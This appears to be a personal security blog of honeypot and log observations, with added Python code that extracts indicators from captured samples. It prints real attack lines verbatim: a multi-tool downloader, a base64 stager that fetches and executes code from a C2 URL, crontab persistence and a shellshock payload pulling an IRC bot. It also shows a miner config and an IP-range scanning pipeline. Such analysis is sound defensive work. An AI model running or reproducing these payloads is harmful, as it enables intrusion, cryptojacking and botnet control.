sumokoin – cryptonight

February 27th, 2018

Another honeypot entry caught my eye. First, the attack itself was
unusual: the downloader does not rely on wget or curl alone, it also
falls back to a small python one-liner to fetch the malware:

uname -a
rm -f /tmp/run
if [ ` getconf LONG_BIT ` -eq 64 ]
then u="http://www.bizqsoft.com/tp2/r6.log"
else u="http://www.bizqsoft.com/tp2/r.log"
fi
wget -O /tmp/run
curl -o /tmp/run
python -c "import urllib;urllib.urlretrieve('$u','/tmp/run')"

Looking into the downloaded binary one finds the embedded configuration of a
miner for the cryptocoin "sumokoin" using the "cryptonight" algorithm (the
key set is the config.json format of XMRig-style miners; note the trailing
comma after the pool list, which strict JSON parsers reject):

{"algo":"cryptonight","av":0,"background":false,"colors":true,"cpu-affinity":null,
 "cpu-priority":null,"donate-level":5,"log-file":null,"max-cpu-usage":75,"print-time":60,
 "retries":5,"retry-pause":5,"safe":false,"syslog":false,"threads":null,
 "pools":[
   {"url":"pool.sumokoin.hashvault.pro:80",
    "user":"Sumoo6Au3wBiUakx2yC748Zecr8qKa1J1eMpMCgBQCup9wPecdW7KZiTVvKXGMqvxEDJrYr8pUpDkhG5MHUjf7XX64WoxR4kxon",
    "pass":"x86_64","keepalive":true,"nicehash":false},
   {"url":"pool.sumokoin.com:3333",
    "user":"Sumoo6Au3wBiUakx2yC748Zecr8qKa1J1eMpMCgBQCup9wPecdW7KZiTVvKXGMqvxEDJrYr8pUpDkhG5MHUjf7XX64WoxR4kxon",
    "pass":"x86_64","keepalive":true,"nicehash":false},
 ],
 "api":{"port":0,"access-token":null,"worker-id":null}}

(see https://coinmarketcap.com/currencies/sumokoin/ )

Looking into a blockchain explorer I currently find no transactions linked
to that address, but that is expected: Sumokoin is a Monero fork and uses ring
signatures and stealth addresses, so an explorer cannot list the payments an
address has received. Two other details of the config are worth noting when
blocking this: the first pool is contacted on port 80, which passes most egress
filters, and "pass":"x86_64" is presumably just the worker name the miner
reports to the pool.
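To pull these indicators out of a sample without reading a hexdump, here is an added example (my code, not from the post or the malware) that locates an embedded config of this shape in a binary blob, tolerates the trailing comma the config above has before its closing bracket, and reduces it to the pools, wallet and worker name you would block or hunt for. The sample blob is constructed inline around an abridged copy of the config shown above; that the config is stored as plain text inside the binary is an assumption.

```python
import json
import re

# The miner config above starts with this key; scanning for it is a cheap way to
# find the config in a stripped binary (assumption: it is stored as plain text).
CONFIG_MAGIC = b'{"algo":'

# Constructed sample: filler bytes around an abridged copy of the config above.
WALLET = ("Sumoo6Au3wBiUakx2yC748Zecr8qKa1J1eMpMCgBQCup9wPecdW7KZiTVvKXGMqvxEDJrYr"
          "8pUpDkhG5MHUjf7XX64WoxR4kxon")
SAMPLE_BLOB = (
    b"\x7fELF\x00\x01\x02\x03 ...junk... "
    b'{"algo":"cryptonight","av":0,"background":false,"max-cpu-usage":75,'
    b'"pools":[{"url":"pool.sumokoin.hashvault.pro:80","user":"' + WALLET.encode() +
    b'","pass":"x86_64","keepalive":true,"nicehash":false},'
    b'{"url":"pool.sumokoin.com:3333","user":"' + WALLET.encode() +
    b'","pass":"x86_64","keepalive":true,"nicehash":false},],'
    b'"api":{"port":0,"access-token":null,"worker-id":null}}'
    b"\x00\x00more junk\x00"
)

def find_json_object(blob, start):
    """Return the balanced {...} starting at blob[start], honouring strings and escapes."""
    depth, in_str, esc = 0, False, False
    for i in range(start, len(blob)):
        c = blob[i:i + 1]
        if in_str:
            if esc:
                esc = False
            elif c == b"\\":
                esc = True
            elif c == b'"':
                in_str = False
            continue
        if c == b'"':
            in_str = True
        elif c == b"{":
            depth += 1
        elif c == b"}":
            depth -= 1
            if depth == 0:
                return blob[start:i + 1]
    return None  # unterminated: truncated dump, or not really JSON

# ",]" / ",}" as shipped in this config; strict json.loads rejects them.
TRAILING_COMMA = re.compile(rb",(\s*[\]}])")

def extract_miner_config(blob):
    """Locate and parse the embedded miner config; None if there is none."""
    pos = blob.find(CONFIG_MAGIC)
    if pos < 0:
        return None
    raw = find_json_object(blob, pos)
    if raw is None:
        return None
    cleaned = TRAILING_COMMA.sub(rb"\1", raw)   # would also touch ",]" inside a string value
    return json.loads(cleaned.decode("utf-8", errors="replace"))

def mining_iocs(config):
    """Reduce the config to what you would block or hunt for."""
    pools = config.get("pools", [])
    return {
        "algo": config.get("algo"),
        "pools": [p["url"] for p in pools],
        "wallets": sorted({p["user"] for p in pools}),
        "worker_names": sorted({p.get("pass", "") for p in pools}),
    }

if __name__ == "__main__":
    print(json.dumps(mining_iocs(extract_miner_config(SAMPLE_BLOB)), indent=2))
```

The brace matcher skips over string contents, so a wallet or pool name containing a brace does not derail it; the trailing-comma cleanup is the one lenient step, and it is deliberately narrow.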

Linux Botnet

January 10th, 2018

Another nice ssh honeypot catch:

uname nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CndoaWxlIFRydWU6CiAgICB0cnk6CiAgICAgICAgcGFnZT1iYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi51cmxvcGVuKCJodHRwOi8vay56c3c4LmNjL0FwaS8iKS5yZWFkKCkpCiAgICAgICAgZXhlYyhwYWdlKQogICAgZXhjZXB0OgogICAgICAgIHBhc3MKICAgIHRpbWUuc2xlZXAoMzAwKQ=='))" > /dev/null 2 >& 1 &

That one-liner is only a stager. Decoded, the base64 argument reads:

#coding: utf-8
import urllib
import base64
while True:
    try:
        page=base64.b64decode(urllib.urlopen("http://k.zsw8.cc/Api/").read())
        exec(page)
    except:
        pass
    time.sleep(300)

So every 300 seconds it downloads a base64-encoded complete python program from http://k.zsw8.cc/Api/ and exec()s it. (The stager never imports time, so the sleep can only work if the downloaded program has imported it into the shared namespace; otherwise the loop dies with a NameError after the first fetch.)

In that program a crontab entry is made (every six hours, as root):

   if runCodePath not in crontabData:
       f = open("/etc/crontab", "a+")
       f.write("\n0 */6 * * * root %s\n" % runCodePath)

then it uploads data about the compromised server to the herder:

   my_data = {"key":d.get_key, "name":d.get_name, "os":d.get_platform, "core":d.get_core, "cpu":d.get_cpucount, "cpuuse":d.get_cpuuse, "status":d.get_status}
   f = urllib.urlopen(apiURL, urllib.urlencode(my_data))

and waits for commands:

   if data.has_key("download") and data["download"]:
       DownExec(data["download"], task_id)
   if data.has_key("cmd") and data["cmd"]:
       CmdExec(data["cmd"], task_id)

I wonder what would happen if the computer name were a BeEF XSS hook or something similar..?
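Peeling such stagers by hand gets old quickly. The following is an added example (my code, not part of the post or of the bot) that takes a honeypot command line, extracts and decodes every base64 blob passed to b64decode(), repeats for nested layers, and reports the URLs and beacon interval found. The command line is constructed from the one quoted above, with the base64 joined back into a single string.

```python
import base64
import re

# Constructed from the honeypot line quoted above (base64 joined back into one string).
HONEYPOT_CMDLINE = (
    "uname nohup python -c \"import base64;exec(base64.b64decode('"
    "I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CndoaWxlIFRydWU6CiAgICB0cnk6CiAgIC"
    "AgICAgcGFnZT1iYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi51cmxvcGVuKCJodHRwOi8vay56c3c4LmNjL0FwaS8iKS5yZWFkKCkpCiAgICAgICAgZXhlYyhwYW"
    "dlKQogICAgZXhjZXB0OgogICAgICAgIHBhc3MKICAgIHRpbWUuc2xlZXAoMzAwKQ=="
    "'))\" > /dev/null 2 >& 1 &"
)

# A base64 literal handed to b64decode(); whitespace inside is tolerated because
# logs and mails wrap long lines.
B64_CALL = re.compile(r"b64decode\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)")
URL_RE = re.compile(r"https?://[^\s'\"<>()]+")

def decode_stagers(cmdline, max_depth=3):
    """Peel base64 exec() layers; returns the decoded source texts, outermost first."""
    layers = []
    current = cmdline
    for _ in range(max_depth):
        m = B64_CALL.search(current)
        if not m:
            break
        try:
            decoded = base64.b64decode(re.sub(r"\s+", "", m.group(1))).decode("utf-8", "replace")
        except ValueError:          # binascii.Error is a ValueError: malformed blob
            break
        layers.append(decoded)
        current = decoded           # the decoded code may itself wrap another blob
    return layers

def stager_iocs(cmdline):
    """What to block and what to expect: C2 URLs, beacon interval, exec() use."""
    text = "\n".join(decode_stagers(cmdline))
    return {
        "urls": sorted(set(URL_RE.findall(text))),
        "beacon_seconds": [int(x) for x in re.findall(r"sleep\((\d+)\)", text)],
        "uses_exec": "exec(" in text,
    }

if __name__ == "__main__":
    for i, layer in enumerate(decode_stagers(HONEYPOT_CMDLINE)):
        print(f"--- layer {i} ---\n{layer}")
    print(stager_iocs(HONEYPOT_CMDLINE))
```

The inner b64decode() call in the decoded stager takes a URL fetch rather than a literal, so the loop correctly stops after one layer; the second stage has to be fetched from the C2 to go further.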

Chinese hackers

May 4th, 2017

Recently on a firewall log: about 1 million deny entries PER DAY with a source address in China .. every single day.

Can't we just ban them from the internet?

Honeypot detection

April 26th, 2017

My honeypots send out an abuse complaint for every single successful login.

Recently I saw the following logged entry in the complaint:

echo -en "\\x31\\x33\\x33\\x37"
cat /bin/ls

Now neither kippo nor cowrie, the usual sshd honeypots, serve a real file at "/bin/ls" that could be looked at, so a 'cat /bin/ls' just results in:

'cat: /bin/ls: No such file or directory'

whereas a real box spits out the ELF binary. So this seems to be an easy and reliable way to test for a standard sshd honeypot..
No wonder: \\x31\\x33\\x33\\x37 just translates to "1337", which I interpret as a smiley left by the hacker ..
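If you run such a honeypot, this probe is worth flagging on its own: a session that cats a system binary is checking whether you are real, and what it does next tells you how it reacts. Here is an added example (my code, not the honeypot's) that runs over cowrie-style JSON log lines, groups commands per session, flags "cat" of any system binary (generalised beyond /bin/ls) and decodes the \xNN payload of echo -e so the "1337" tag is readable. The log lines are constructed, not real captures.

```python
import codecs
import json
import re

# Constructed cowrie-style JSON log lines (one event per line), not real data.
SAMPLE_LOG = r'''
{"eventid": "cowrie.session.connect", "session": "c0ffee01", "src_ip": "192.0.2.10"}
{"eventid": "cowrie.command.input", "session": "c0ffee01", "input": "echo -en \"\\x31\\x33\\x33\\x37\""}
{"eventid": "cowrie.command.input", "session": "c0ffee01", "input": "cat /bin/ls"}
{"eventid": "cowrie.command.input", "session": "c0ffee02", "input": "uname -a"}
{"eventid": "cowrie.command.input", "session": "c0ffee02", "input": "wget -O /tmp/run http://198.51.100.7/r.log"}
'''

# "cat" of a system binary: a real host answers with ELF bytes, a stock
# kippo/cowrie answers "No such file or directory". Generalised beyond /bin/ls.
PROBE_RE = re.compile(r"^cat\s+/(?:usr/)?s?bin/\S+$")
# echo -e/-n/-en with an optionally quoted payload; group 2 is the payload.
ECHO_RE = re.compile(r"""^echo\s+-[a-zA-Z]+\s+(['"]?)(.*?)\1\s*$""")

def decode_escapes(payload):
    """Turn the \\xNN text the attacker typed into what a real echo -e would print."""
    return codecs.decode(payload, "unicode_escape")

def triage(log_text):
    """Group command events by session and flag honeypot-fingerprinting behaviour."""
    sessions = {}
    for line in log_text.splitlines():
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        if ev.get("eventid") != "cowrie.command.input":
            continue
        s = sessions.setdefault(ev["session"],
                                {"probe": False, "echo_payloads": [], "commands": []})
        cmd = ev["input"].strip()
        s["commands"].append(cmd)
        if PROBE_RE.match(cmd):
            s["probe"] = True
        m = ECHO_RE.match(cmd)
        if m:
            s["echo_payloads"].append(decode_escapes(m.group(2)))
    return sessions

if __name__ == "__main__":
    for sid, info in triage(SAMPLE_LOG).items():
        tag = "FINGERPRINT" if info["probe"] else "ok"
        print(sid, tag, info["echo_payloads"], info["commands"])
```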

RSA broken?

February 25th, 2016

Via twitter I was directed to

https://www.linkedin.com/pulse/rsa-beginning-end-william-buchanan

(Thanks @Andrea for retweeting)

and saw a really fascinating approach to break RSA with pre-calculated prime factors: rather than factoring the modulus, the cracker checks whether one of the primes it already holds divides N.

Here is an online RSA-cracker:

http://asecuritysite.com/encryption/crackrsa?n=89%2C070%2C570%2C720%2C149%2C060%2C561%2C995%2C361%2C437%2C269%2C869%2C694%2C609%2C685%2C454%2C824%2C674%2C559

(cracking N=89070570720149060561995361437269869694609685454824674559, a 56-digit, roughly 186-bit modulus)

Wondering what will come next..

Worth keeping in mind, though: the lookup only succeeds when one of N's prime factors is already in the table, i.e. when N is tiny like this one or was generated from a weak prime generator. A 2048-bit modulus built from two random 1024-bit primes is out of reach of any precomputed table.
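To make the "pre-calculated primes" idea concrete, here is an added example (my code, not the tool linked above) that builds a table of primes, tries each as a divisor of N, and on success recovers d and decrypts a ciphertext. It is run against a constructed toy key whose primes sit inside the table and against a constructed modulus made of two Mersenne primes that no table of small primes covers; the table size of one million is an assumption.

```python
from math import isqrt

def prime_table(bound):
    """Sieve of Eratosthenes: the precomputed primes a lookup-style cracker keeps."""
    sieve = bytearray([1]) * (bound + 1)
    sieve[0] = sieve[1] = 0
    for i in range(2, isqrt(bound) + 1):
        if sieve[i]:
            sieve[i * i::i] = bytes(len(range(i * i, bound + 1, i)))
    return [i for i in range(bound + 1) if sieve[i]]

PRIMES = prime_table(1_000_000)   # ~78k primes; the "database" (assumed size)

def crack_rsa(n, e, primes=PRIMES):
    """Recover (p, q, d) if some precomputed prime divides n, else None."""
    for p in primes:
        if p * p > n:
            break                      # n would have to be prime itself
        if n % p == 0:
            q = n // p
            phi = (p - 1) * (q - 1)
            d = pow(e, -1, phi)        # modular inverse (Python 3.8+)
            return p, q, d
    return None

# Toy key from two five-digit primes (constructed; well inside the table).
TOY_P, TOY_Q, E = 10007, 10009, 65537
TOY_N = TOY_P * TOY_Q
TOY_C = pow(42, E, TOY_N)            # "encrypt" the message 42

# Same attack against a modulus whose factors are in no table of small primes:
# the Mersenne primes 2^31-1 and 2^61-1 (constructed, ~92-bit modulus).
BIG_N = (2**31 - 1) * (2**61 - 1)

if __name__ == "__main__":
    p, q, d = crack_rsa(TOY_N, E)
    print(f"toy key: p={p} q={q} recovered m={pow(TOY_C, d, TOY_N)}")
    # None: not a single table entry divides it. A real 2048-bit modulus built
    # from two random 1024-bit primes is hopeless for this method.
    print("Mersenne modulus:", crack_rsa(BIG_N, E))
```

The toy key falls in a few milliseconds; the 92-bit modulus survives the whole table, which is the entire point: the table does not scale, it only catches keys that were small or badly generated.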

remote website screenshots

January 12th, 2016

Recently I wanted to check if, and what kind of, web pages are available in a specific IP address range. So I decided to scan the IPs and take screenshots of the services found. Not as professional as archive.org or similar .. just a short look to get an idea. The problem was that there was no tool I could just fire up. So I started fiddling with some scripts ..

Step 1: scan the IP range. I used nmap (what else) and logged the results in a file.

 nmap --open -p80,443 --host-timeout 3 --max-retries 2 172.16.0.0/16 > ll

That went quite fast.. it took only a few minutes. After that I ran a small script to clean up the result:

#!/bin/bash
# hosts nmap gave up on ("Skipping host ... due to host timeout");
# $4 is the "(ip)" field when reverse DNS resolved the host
grep -i "skipping" *ll > sl
awk '{ print $4 }' < sl | sed 's/[()]//g' > sl2
# hosts with a scan report ("Nmap scan report for ... (ip)")
grep "report for" *ll > l
awk '{ print $NF }' < l | sed 's/[()]//g' > l2
# drop the timed-out hosts from the target list; exact whole-line match,
# so that 172.16.1.1 does not also remove 172.16.1.10
for i in `cat sl2`
do
  grep -vxF "$i" l2 > xx
  mv xx l2
done

./l.sh
./i.sh

Okay .. here is the l.sh and i.sh:
l.sh (start Tor first .. I don't want to annoy anyone..):

for i in `cat l2`
do
  torsocks wget --convert-links -B http://$i --no-check-certificate -t 1 -T 2 -O $i.html $i ; xvfb-run -- wkhtmltopdf $i.html $i.pdf
  torsocks wget --convert-links -B https://$i --no-check-certificate -t 1 -T 2 -O $i-443.html https://$i ; xvfb-run -- wkhtmltopdf $i-443.html $i-443.pdf
done

It took some tries with wget until I had an acceptable result. I played around with "-p", "-r -l 1", "-E" and "-K" .. the variant with just -B worked best for me. So I had the html files.. but I wanted a quick look at them and did not want to browse local files one by one. Therefore I converted the html files to pdf, and then (in the next step) used convert to get png files. (Did not find any html-to-png tools.) One caveat with l.sh as written: only wget runs under torsocks. wkhtmltopdf renders the saved page with its own WebKit engine and fetches every image, stylesheet and script the page references directly from the target, so the rendering step contacts the target from your real address unless you run it under torsocks as well (or point it at a proxy).

i.sh :

for i in *.pdf
do
  convert "$i" "`basename -s .pdf "$i"`.png"
done

(After that: copy the png files to a place of your choice.., generate thumbnails..scroll around… Note that convert writes one png per pdf page, name-0.png, name-1.png and so on, when a pdf has several pages; "$i[0]" keeps only the first.)

There are some commercial vendors for services like this with much better quality (including zoomable thumbnails, galleries..you name it) but I wanted a quick'n dirty solution for free..

Though I am pretty sure that there are much better tools and a hundred better solutions, this worked for me.
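The same pipeline in one place, as an added example (my code, not the scripts above): nmap's XML output (-oX) is parsed instead of grepping the human-readable report, so timed-out hosts and closed ports never enter the target list, the render step runs under torsocks too, and convert is told to keep the first page only. The nmap XML below is constructed, not a real scan; the tool names and the output directory are assumptions.

```python
import subprocess
import xml.etree.ElementTree as ET
from pathlib import Path

# Constructed nmap -oX output for a scan like the one above (not real results).
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host><status state="up"/><address addr="172.16.0.12" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
      <port protocol="tcp" portid="443"><state state="closed"/></port>
    </ports></host>
  <host><status state="up"/><address addr="172.16.0.44" addrtype="ipv4"/>
    <hostnames><hostname name="web.example.internal" type="PTR"/></hostnames>
    <ports><port protocol="tcp" portid="443"><state state="open"/></port></ports></host>
  <host><status state="down"/><address addr="172.16.0.90" addrtype="ipv4"/></host>
</nmaprun>"""

def open_web_targets(nmap_xml):
    """(ip, port) for every open port of every host that is up; no grep/sed needed."""
    targets = []
    for host in ET.fromstring(nmap_xml).iter("host"):
        status = host.find("status")
        if status is not None and status.get("state") != "up":
            continue                      # timed out / down: nothing to fetch
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        for port in host.iter("port"):
            state = port.find("state")
            if state is not None and state.get("state") == "open":
                targets.append((addr.get("addr"), int(port.get("portid"))))
    return targets

def capture_commands(ip, port, outdir="."):
    """Commands for one target; returned instead of run so they can be reviewed and tested."""
    scheme = "https" if port == 443 else "http"
    base = f"{scheme}://{ip}:{port}/"
    out = Path(outdir) / f"{ip}-{port}"
    return [
        ["torsocks", "wget", "-q", "--convert-links", "-B", base, "--no-check-certificate",
         "-t", "1", "-T", "2", "-O", f"{out}.html", base],
        # Render under torsocks as well: the saved page still references images, CSS
        # and scripts on the target, and wkhtmltopdf fetches those itself.
        ["xvfb-run", "-a", "--", "torsocks", "wkhtmltopdf", f"{out}.html", f"{out}.pdf"],
        # "[0]": first page only, so a long page does not become name-0.png, name-1.png, ...
        ["convert", f"{out}.pdf[0]", f"{out}.png"],
    ]

def run_pipeline(nmap_xml, outdir="."):
    """nmap XML in, PNG screenshots out. Needs torsocks, wget, xvfb-run, wkhtmltopdf, convert."""
    done = []
    for ip, port in open_web_targets(nmap_xml):
        for cmd in capture_commands(ip, port, outdir):
            if subprocess.run(cmd).returncode != 0:
                break                     # e.g. wget got nothing: nothing to render
        else:
            done.append(f"{ip}-{port}.png")
    return done

if __name__ == "__main__":
    import sys
    # nmap --open -p80,443 --host-timeout 3 --max-retries 2 -oX scan.xml 172.16.0.0/16
    print(run_pipeline(Path(sys.argv[1]).read_text()))
```

Keeping the command construction separate from the execution is what makes the pipeline testable offline; the network part is a thin loop over it.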

~7000 ssh logins

January 5th, 2016

Recently I looked into some honeypot results, which ended in finding the URL

http://185.62.190.222/r1

(Warning: without the /r1 you are redirected to a fake Adobe update.)

Looking around further I found (besides some scanner tools, code..) two files stage1 and stage2 under the subdir /r4, containing about 7000 username:password:ip-address combinations. And yes, I found some of my honeypot addresses in there 🙂 Though I am pretty sure that most of the addresses will be honeypots, I will try to send out mails to the appropriate abuse contacts; maybe some of them are real.

recently in the webserver log ..

August 17th, 2015

While strolling through the webserver logs, I found this little asshole..:

78.25.80.226 - - [16/Aug/2015:21:35:01 +0200] "GET /suspendedpage.cgi HTTP/1.1" 404 494 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://189.11.9.243/fix.pl;curl -O http://189.11.9.243/fix.pl;fetch http://189.11.9.243/fix.pl;lwp-download http://189.11.9.243/fix.pl;perl fix.pl;rm -rf fix.pl;rm -rf fix.pl*\""

fix.pl is a Perl IRC bot: it connects to an IRC server and waits for commands
such as portscan, tcpflood or a reverse shell ..

Looks like there are still servers out there which are vulnerable to shellshock ..
(The "() { :;};" at the start of the User-Agent is the classic function-definition
prefix; a vulnerable bash evaluates whatever follows it as soon as a CGI script
exports the header into its environment, hence the probe against a .cgi path.)
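Spotting these in a busy access log is easy to automate. Here is an added example (my code, not the page's) that parses combined-format log lines, looks for the shellshock function-definition prefix in the Referer and User-Agent fields, and reports the source, the targeted path, the payload and the download URLs in it as indicators. The log text is constructed from the line quoted above plus one benign request.

```python
import re

# Constructed: the log line quoted above plus a benign request, combined log format.
SAMPLE_LOG = r'''78.25.80.226 - - [16/Aug/2015:21:35:01 +0200] "GET /suspendedpage.cgi HTTP/1.1" 404 494 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://189.11.9.243/fix.pl;curl -O http://189.11.9.243/fix.pl;fetch http://189.11.9.243/fix.pl;lwp-download http://189.11.9.243/fix.pl;perl fix.pl;rm -rf fix.pl;rm -rf fix.pl*\""
203.0.113.5 - - [16/Aug/2015:21:36:10 +0200] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/40.0"
'''

# Combined log format; quoted fields may contain \" because Apache escapes quotes.
QUOTED = r'"((?:[^"\\]|\\.)*)"'
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] ' + QUOTED + r' (\d{3}) (\S+) '
                    + QUOTED + r' ' + QUOTED + r'\s*$')
# The shellshock prefix: "() {" ... "};" with the injected command after it.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;')
URL_RE = re.compile(r'https?://[^\s;"\'\\]+')

def parse_line(line):
    """One combined-format line to a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    src, ts, req, status, size, ref, ua = m.groups()
    return {"src_ip": src, "time": ts, "request": req, "status": int(status),
            "referer": ref, "user_agent": ua.replace('\\"', '"')}

def find_shellshock(log_text):
    """One hit per request carrying a shellshock payload in Referer or User-Agent."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        parts = rec["request"].split(" ")
        target = parts[1] if len(parts) > 1 else rec["request"]
        for field in ("referer", "user_agent"):
            m = SHELLSHOCK_RE.search(rec[field])
            if m:
                payload = rec[field][m.end():].strip()   # the command after "};"
                hits.append({"src_ip": rec["src_ip"], "time": rec["time"], "field": field,
                             "target": target, "payload": payload,
                             "urls": sorted(set(URL_RE.findall(payload)))})
    return hits

if __name__ == "__main__":
    for h in find_shellshock(SAMPLE_LOG):
        print(h["src_ip"], h["target"], h["field"], h["urls"])
        print("   ", h["payload"])
```

The regex is deliberately loose about whitespace inside "() { :;};" because real probes vary it; the payload extraction starts right after the closing "};", which is exactly what a vulnerable bash would have executed.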

So you want to be a darknet drug lord ..

April 16th, 2015

..is the title of an article a user named "th3j35t3r" published on pastebin.

Here is the link to the interesting article

Starwars in the office

January 5th, 2015

Now here is a funny movie about what happens in an office when nerds get attacked..

https://t.co/JIBMlNs4ei